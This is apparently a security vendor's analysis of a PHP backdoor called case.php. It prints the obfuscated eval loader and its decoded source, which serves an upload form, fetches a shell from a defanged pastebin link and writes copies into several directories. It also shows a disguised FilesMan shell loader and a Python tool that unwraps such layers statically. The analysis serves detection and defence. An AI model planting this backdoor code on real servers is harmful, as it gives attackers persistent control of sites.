This case.php malware uses obfuscated PHP code.
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator
This code was created on Tuesday, October 11th, 2016 at 20:42 UTC from IP 127.0.0.1
Checksum: 8cd43e5661300d78ed1687053d51d6b3f2647d76
*/
// The hex/octal escape string below is just the function name "base64_decode",
// so the line that follows is eval(base64_decode("...")).
$w03728af="\x62\x61\x73\x65\66\x34\137\144\145\143\157\x64\145";
@eval($w03728af( "Ly9OTHRScS9mcjJYRzZhM3FPd3lza0FCeXYrVWJ2R281ZVdiTFpWUWJTZVFNbE0wMjh0dFZzMGdKcVJ GV0EyZG43aXZ1RktUVytIQmJwNjFlWXpzRHdob3hQUEtTRFViMzAvVUZzYUpoOTlEcmpJTHRSMTdiL1d
Decoding the obfuscation
There are tools for decoding obfuscated PHP code:
https://www.unphp.net
http://ddecode.com/phpdecoder/
http://lombokcyber.com/en/detools/decode-fopo
but they don't always work as expected.
That's why we decoded this one manually.
Source case.php
error_reporting(0);

// up=kido: prints the system uname and serves an upload form; the posted file is
// written next to the script under its original name.
if ($_GET["up"] == "kido"){
    echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
    $filename = $_FILES['file']['name'];
    $filetmp = $_FILES['file']['tmp_name'];
    echo "<form method='POST' enctype='multipart/form-data'> <input type='file' name='file' /> <input type='submit' value='go' /> </form>";
    if(move_uploaded_file($filetmp,$filename)=='1'){
        echo '<b>'.$filename;
    }
}

// up=loba: fetches a shell from pastebin and writes three copies into parent directories.
if ($_GET["up"] == "loba"){
    $shell=file_get_contents('hxxp://pastebin.com/raw/********');
    $sh=fopen("../../plug.php", "w");
    fwrite($sh,$shell);
    fclose($sh);
    $sh11=fopen("../../../xmle.php", "w");
    fwrite($sh11,$shell);
    fclose($sh11);
    $sh22=fopen("../id.php", "w");
    fwrite($sh22,$shell);
    fclose($sh22);
    echo " shell Uploadet =>> success.php";
}

// up=htc: overwrites the local .htaccess with content fetched from pastebin.
if ($_GET["up"] == "htc"){
    $shell=file_get_contents('hxxp://pastebin.com/raw/********');
    $sh=fopen("./.htaccess", "w");
    fwrite($sh,$shell);
    fclose($sh);
    echo " shell Uploadet =>> htc";
}

// up=cp: drops one more copy as ../../modulse.php.
if ($_GET["up"] == "cp"){
    $shell=file_get_contents('hxxp://pastebin.com/raw/********');
    $sh=fopen("../../modulse.php", "w");
    fwrite($sh,$shell);
    fclose($sh);
    echo " shell Uploadet =>> htc";
}
Again, this malware tries to load more backdoor files onto the server to get full control.
plug.php FilesMan Shell
The FilesMan shell is stored as base64 over str_rot13 over gzdeflate output, so the loader unpacks it with base64_decode, str_rot13 and gzinflate before eval. The docblock is a fake header imitating a legitimate admin page:
/**
 * Homepage and main page for admin panel, index.php
 * @category admin
 *
 * @author PatosMercado <contato@patosmercado.com.br>
 * @copyright PatosMercado
 * @license http://www.opensource.org/licenses/osl-3.0.php Open-source licence 3.0
 * @version 1.3
 *
 */
$joomlahindex="5b14ShvH0ij82Xut/R+GiZKRbyEkbns7gHEwBhtfwOHiG/goI3YkWhh2lJkRgjj890ZIfZ+LEEH287x0vSQGqbu6uvpJXV1IXV3qhU4YT$
eval(gzinflate(str_rot13(base64_decode($joomlahindex))))
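The manual decoding described above (the FOPO escape-string trick in case.php and the base64/str_rot13/gzinflate chain of plug.php) can be done statically, without ever running the payload. The following is an added example written for this post, not code from the page or from any tool it links; the two SAMPLE_* strings are constructed fixtures that imitate the two layouts with a harmless statement, not the real payloads.

```python
import base64
import re
import zlib

# Byte-wise str_rot13: only ASCII letters rotate; the layer here runs over raw DEFLATE bytes.
ROT13 = bytes.maketrans(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
                        b"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm")
# PHP decoder names mapped to equivalents that unwrap without executing anything.
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": lambda d: d.translate(ROT13),
    "gzinflate": lambda d: zlib.decompress(d, -15),  # raw DEFLATE, no zlib header
}

def php_unescape(s: str) -> str:
    """Expand \\xHH and octal \\NNN escapes of a PHP double-quoted string."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})",
                  lambda m: chr(int(m.group(1), 16) if m.group(1) else int(m.group(2), 8)), s)
def string_var(source: str, name: str) -> str:
    """Return the double-quoted literal assigned to $name in the snippet."""
    m = re.search(r"\$" + re.escape(name) + r'\s*=\s*"([^"]*)"', source)
    if not m:
        raise ValueError("no string assignment for $" + name)
    return m.group(1)

def unwrap(source: str) -> bytes:
    """Statically peel the eval() wrapper of a PHP dropper and return the hidden code."""
    # Form 1 (FilesMan): eval(f1(f2(f3($var)))) -> apply f3, f2, f1 to $var's literal
    m = re.search(r"eval\(((?:\w+\()+)\$(\w+)\)+", source)
    if m:
        funcs = m.group(1).rstrip("(").split("(")
        data = string_var(source, m.group(2)).encode()
    else:
        # Form 2 (FOPO): eval($fn("literal")) where $fn holds an escaped function name
        m = re.search(r'eval\(\$(\w+)\(\s*"([^"]*)"\s*\)\)', source)
        if not m:
            raise ValueError("no recognised eval() wrapper")
        funcs = [php_unescape(string_var(source, m.group(1)))]
        data = m.group(2).encode()
    for fn in reversed(funcs):  # innermost call runs first
        data = DECODERS[fn](data)
    return data

# Constructed samples (not the page's payloads): a harmless statement wrapped in each layout.
SAMPLE_CODE = b"<?php echo 'unwrapped without eval';"
RAW_DEFLATE = zlib.compress(SAMPLE_CODE)[2:-4]  # drop zlib header/adler32 -> raw DEFLATE
SAMPLE_FILESMAN = '$joomlahindex="%s"; eval(gzinflate(str_rot13(base64_decode($joomlahindex))));' % \
    base64.b64encode(RAW_DEFLATE.translate(ROT13)).decode()
SAMPLE_FOPO = r'$w03728af="\x62\x61\x73\x65\66\x34\137\144\145\143\157\x64\145";@eval($w03728af("%s"));' \
    % base64.b64encode(SAMPLE_CODE).decode()
```

Running unwrap() on a real sample only recovers the next layer; FOPO output in particular is usually another eval() wrapper, so loop until no wrapper remains and inspect the result in an editor rather than executing it.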
Final words
Websites using the Malware Expert ModSecurity rules are protected against this backdoor.
Use Malware Expert Signatures to detect this backdoor malware in files for FREE!